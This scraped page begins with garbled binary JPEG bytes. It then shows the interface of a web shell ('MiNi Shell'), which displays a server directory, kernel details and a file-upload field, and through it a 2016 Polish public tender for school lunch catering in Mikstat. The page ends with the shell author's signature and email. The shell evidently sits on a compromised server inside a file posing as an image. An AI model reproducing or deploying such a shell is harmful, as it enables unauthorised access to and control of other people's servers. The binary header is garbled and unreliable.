JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160623/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160623/101541-N-2016.html

<p class="kh_header"><b>Mikstat: Przygotowywanie i wydawanie obiadów dla Szkoły Podstawowej w Mikstacie, Publicznego Gimnazjum w Mikstacie, Szkoły Podstawowej w Kaliszkowicach Kaliskich, Szkoły Podstawowej w Kaliszkowicach Ołobockich oraz Szkoły Podstawowej w Biskupicach Zabarycznych w udostępnionych przez zamawiającego pomieszczeniach kuchni i stołówki wraz z wyposażeniem</b><br>
<b>Numer ogłoszenia: 101541 - 2016; data zamieszczenia: 23.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa im. Ewarysta Estkowskiego w Mikstacie , ul. Grabowska 13A, 63-510 Mikstat, woj. wielkopolskie, tel. 62 731 00 25, faks 62 731 00 25.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.spmikstat.szkolnastrona.pl/bip/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła Podstawowa Publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowywanie i wydawanie obiadów dla Szkoły Podstawowej w Mikstacie, Publicznego Gimnazjum w Mikstacie, Szkoły Podstawowej w Kaliszkowicach Kaliskich, Szkoły Podstawowej w Kaliszkowicach Ołobockich oraz Szkoły Podstawowej w Biskupicach Zabarycznych w udostępnionych przez zamawiającego pomieszczeniach kuchni i stołówki wraz z wyposażeniem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w szczególności prowadzenie przez Wykonawcę żywienia zbiorowego dla szkół gminy Mikstat na następujących zasadach:
Codzienne przygotowywanie w kuchni szkolnej w godzinach od 7.00 do 15.00 i wydawanie ok. 130 obiadów dla dzieci w wieku szkolnym i młodzieży gimnazjalnej. Posiłki będą przygotowywane w kuchni Szkoły Podstawowej w Mikstacie przez pięć roboczych dni tygodnia z uwzględnieniem organizacji roku szkolnego. Posiłki dla dzieci ze Szkoły Podstawowej w Kaliszkowicach Kaliskich, ze Szkoły Podstawowej w Kaliszkowicach Ołobockich oraz ze szkoły w Biskupicach Zabarycznych będą rozwożone w termosach wg ustalonego z kierownikiem świetlicy planu.
Obiad powinien składać się z zupy, drugiego dania, surówki i kompotu oraz być przygotowany ze środków spożywczych dopuszczonych do stosowania w ramach żywienia zbiorowego dzieci i młodzieży w jednostkach oświatowych.
Jadłospis dekadowy podlegać będzie kontroli Zamawiającego. Wykonawca zobowiązuje się do przedstawienia jadłospisów na kolejne 10 dni najpóźniej trzy dni robocze przed terminem obowiązywania jadłospisu. Na wniosek Dyrektora SP w Mikstacie, Wykonawca zobowiązany będzie do niezwłocznej zmiany zakwestionowanego jadłospisu.
Czas wydawania posiłków będzie zarezerwowany dla dzieci w następujących godzinach:
11.30 obiad dla dzieci szkoły podstawowej,
12.30 obiad dla uczniów gimnazjum
od ok. 11.30 rozwożenie w termosach obiadów do szkół w Kaliszkowicach Kaliskich,  Kaliszkowicach Ołobockich, Biskupicach Zabarycznych.
Zamawiający zamierza udostępnić Wykonawcy, wyłonionemu w drodze przetargu nieograniczonego, na podstawie odrębnej umowy najmu, pomieszczeń kuchni szkolnej i stołówki wraz z wyposażeniem w celu prowadzenia żywienia zbiorowego dla szkół gminy Mikstat w budynku Publicznego Gimnazjum w Mikstacie.
Przedmiot zamówienia ma być realizowany na następujących zasadach:
4.1. Przygotowywanie posiłków dla dzieci musi być zgodne z normą żywieniową i racjami pokarmowymi, określonymi dla dzieci w wieku szkolnym oraz młodzieży gimnazjalnej. Posiłki muszą być świeże, posiadać walory smakowe i estetyczne. Ważna jest również estetyka podawania ich dzieciom.
4.2. Wykonawca dostarczy obiady do szkół podstawowych w Kaliszkowicach Kaliskich, Kaliszkowicach Ołobockich i Biskupicach Zabarycznych w naczyniach jednorazowych oraz sztućcach jednorazowego użytku, przeznaczonych do kontaktu z żywnością. Takie same warunki powinny spełniać środki transportu i termosy służące do przewożenia posiłków.
4.3. Obiady Wykonawca dostarczać będzie własnym transportem, na własne ryzyko - pojazdem przystosowanym do przewozu żywności, w specjalistycznych termosach, gwarantujących utrzymanie odpowiedniej temperatury oraz jakości przewożonych potraw.
4.4. W pomieszczeniach kuchni i stołówki oraz na terenie użytkowym - porządek i czystość ma odpowiadać wymogom odpowiednich służb.
4.5. Wykonawca będzie zobowiązany do przygotowywania posiłków o najwyższym standardzie, na bazie produktów najwyższej jakości i z bezpieczeństwem zgodnie z wymogami Państwowego Inspektora Sanitarnego, norm systemu HACCP oraz innych obowiązujących w tym zakresie aktów prawnych. Dlatego też wykonawca winien posiadać przeszkolenie z systemu HACCP w placówkach żywienia zbiorowego, z zakresu BHP oraz aktualne książeczki zdrowia.
4.6. Wykonawca zapewnia urozmaicenie jadłospisów. Wykonawca zobowiązany będzie dostarczać dekadowe jadłospisy do wcześniejszego zatwierdzenia co najmniej trzy dni przed terminem jego realizacji. Wszelkie zmiany w menu sugerowane przez szkołę, będą dla niego wiążące.
4.7. Ilość posiłków będzie się zmieniać w zależności od zamówień i frekwencji dzieci.
4.8. Wykonawca odpowiada prawnie za żywienie dzieci przed Powiatowym Inspektorem Sanitarnym.
4.9. Wykonawca odpowiada prawnie za ochronę p/poż. oraz przeglądy wydzierżawionych pomieszczeń i urządzeń znajdujących się w tych pomieszczeniach. Koszty z tym związane pokrywa wykonawca.
4.10. Do obowiązków Wykonawcy należeć będzie dokonywanie comiesięcznych rozliczeń za wydane posiłki.
4.11. Wykonawca i jego personel zobowiązani są uwzględniać i wprowadzać w życie uwagi Zamawiającego - dotyczące sposobu wykonywania usług - osoba upoważnioną do przekazywania uwag jest Kierownik Świetlicy i Dyrektor Szkoły Podstawowej w Mikstacie.
4.12. W ramach nadzoru nad jakością świadczonych usług, Zamawiający zastrzega sobie prawo do oceny posiłków, poprzez dokonywanie sporadycznych, szczątkowych degustacji sporządzanych w szkole dań. Wnioski wynikające z takowych degustacji będą wiążące dla Wykonawcy.
4.13. Reklamacje jakościowe zgłaszane będą bezpośrednio na linii Kierownik Świetlicy lub Dyrektor Szkoły - Wykonawca.
4.14. Zamawiający przewiduje możliwość waloryzacji cen posiłków w każdym roku szkolnym, w trakcie realizacji umowy jednak nie więcej niż o średnioroczny wskaźnik wzrostu towarów i usług konsumpcyjnych ogłoszony przez prezesa GUS .
4.15. Zamawiający zobowiązuje się we własnym zakresie dokonywać rozliczeń finansowych z Miejsko - Gminnym Ośrodkiem Pomocy Społecznej za opłacane przez te instytucję posiłki.
Wykonawca ponadto:
doposaży wydzierżawione pomieszczenia na własny koszt w urządzenia  i wyposażenie niezbędne do prowadzenia przedmiotowej działalności gospodarczej,
wykonuje na własny koszt konserwacje, remonty bieżące i kapitalne urządzeń i sprzętu wydzierżawionego z częstotliwością zgodną z technologią ich użytkowania,
dostosuje i przeprowadzi remonty niezbędne do prowadzenia przedmiotowej działalności wydzierżawionych pomieszczeń na własny koszt,
uiszcza czynsz oraz opłaty dodatkowe za: energię elektryczną, wodę, gaz, odprowadzenie ścieków według wskazań liczników (podliczników), a także wywóz nieczystości stałych związanych z prowadzeniem działalności gospodarczej.
Zamawiający określa czynsz miesięczny i opłaty za najem pomieszczeń kuchni wraz z wyposażeniem (ryczałtowo, miesięcznie) 500,00 zł z podatkiem VAT.
Obiady dla osób pozostałych (nie będących pracownikami w/w szkół) będą wydawane poza godzinami zarezerwowanymi dla dzieci i młodzieży szkolnej.
Na prośbę zainteresowanych osób (rodziców dzieci) obiad będzie wydawany do naczyń na wynos.
Szkoła może bezpłatnie korzystać z pomieszczeń kuchni i stołówki w przypadku uroczystości szkolnych. Terminy uzgadnia z dzierżawcą.
Wykonawca wszelkie urządzenia i sprzęt kuchenny zwróci w stanie technicznym 100% sprawności. Zostanie to potwierdzone odpowiednimi przeglądami technicznymi wykonanymi na koszt Wynajmującego przez uprawnione do tego osoby. W przypadku zniszczenia lub zużycia sprzętu Wynajmujący na własny koszt odtwarza wyposażenie kuchni i stołówki do poziomu takiego jaki zastał w dniu podpisania umowy. Stan początkowy zostanie określony w protokole zgodnym ze stanem faktycznym i odpowiednimi księgami inwentaryzacyjnymi. Ściany zostaną pomalowane, a wszelka budowlana infrastruktura kuchni doprowadzona do stanu z dnia podpisania umowy. 
Wynajmujący nie może prowadzić sprzedaży ani podawania alkoholu.
Wynajmujący od dnia podpisania umowy odpowiada za powierzone mu mienie. Zabezpiecza je przed kradzieżą, dewastacją, pożarem, dostępem osób nieupoważnionych.
Wszelkie remonty, inwestycje i każda ingerencja Wynajmującego w pomieszczeniach kuchni i stołówki wykonywane są na koszt Wynajmującego w porozumieniu i za zgodą Dyrektora Szkoły.
Prowadzona działalność nie może stać w sprzeczności z dobrym imieniem szkoły.
Przedmiot zamówienia według kodu CPV: 
55.00.00-0 Pozostała usługowa działalność gastronomiczna 
55.32.00.00-9 - Usługi podawania posiłków
55.32.10.00-6 - Usługi przygotowywania posiłków
55.32.20.00-3 - Usługi gotowania posiłków
55.52.11.00-9 - Usługi rozwożenia posiłków.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.32.00.00-9, 55.32.10.00-6, 55.32.20.00-3, 55.52.11.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 05.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek udziału w postępowaniu jeżeli wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał co najmniej 1 usługę polegającą na przygotowaniu i dostarczaniu w sposób ciągły przez okres minimum 6 miesięcy posiłków dla minimum 100 osób dziennie przez 5 dni w tygodniu wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie.
W wykazie należy podać rodzaj usługi, datę wykonania, odbiorcę oraz ilość osób dla których była świadczona usługa ( Zał. nr 4 do SIWZ).
Do wykazu należy dołączyć dowody potwierdzające ukończenie i wykonanie z należytą starannością wymienionych w wykazie usług . Wykaz należy sporządzić zgodnie ze wzorem stanowiącym załącznik Nr 4 do niniejszej SIWZ.
W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania powyższego warunku Zamawiający wymaga, aby Wykonawca przedłożył opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 100.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Oświadczenie o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 i 2 ustawy Prawo zamówień publicznych - załącznik nr 2 do niniejszej SIWZ.
2) Dekadowy proponowany jadłospis wg proponowanej ceny wraz z kosztorysem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania istotnych zmian umowy w stosunku do treści oferty, w szczególności gdy: 
1) nastąpią istotne zmiany przepisów lub norm mających zastosowanie do przedmiotu zamówienia;
2) nastąpią zmiany obowiązującej stawki VAT, ulec zmianie może cena w takim zakresie w jakim będzie to wynikało z przepisów;
3) w wyniku zaistnienia okoliczności, których Zamawiający nie mógł przewidzieć w chwili podpisania umowy; 
4) Wprowadzenie zmian dotyczących treści o charakterze informacyjnym lub instrukcyjnym, niezbędnym do realizacji Umowy, w szczególności zmian dotyczących numeru rachunku bankowego Wykonawcy lub Zamawiającego, zmiany osób upoważnionych do komunikowania się, zmiany osób odpowiedzialnych za potwierdzenie prawidłowej realizacji Umowy wraz z adresami, numerami telefonów, telefaksów, adresów poczty elektronicznej, itp. nie są zmianami istotnymi i zawsze dopuszczalne za porozumieniem stron.
- Zmiana umowy dokonana z naruszeniem przepisu ust. 4 jest nieważna.
5) Okoliczności przewidziane powyżej w ustępach od 2 do 4 stanowiące podstawę zmiany Umowy stanowią uprawnienie Zamawiającego, a nie jego obowiązek.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.spmikstat.szkolnastrona.pl/bip/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szkoła Podstawowa im. E. Estkowskiego w Mikstacie, ul. Grabowska 13a, 63 - 510 Mikstat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2016 godzina 10:00, miejsce: Szkoła Podstawowa im. E. Estkowskiego w Mikstacie, ul. Grabowska 13a, 63 - 510 Mikstat (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com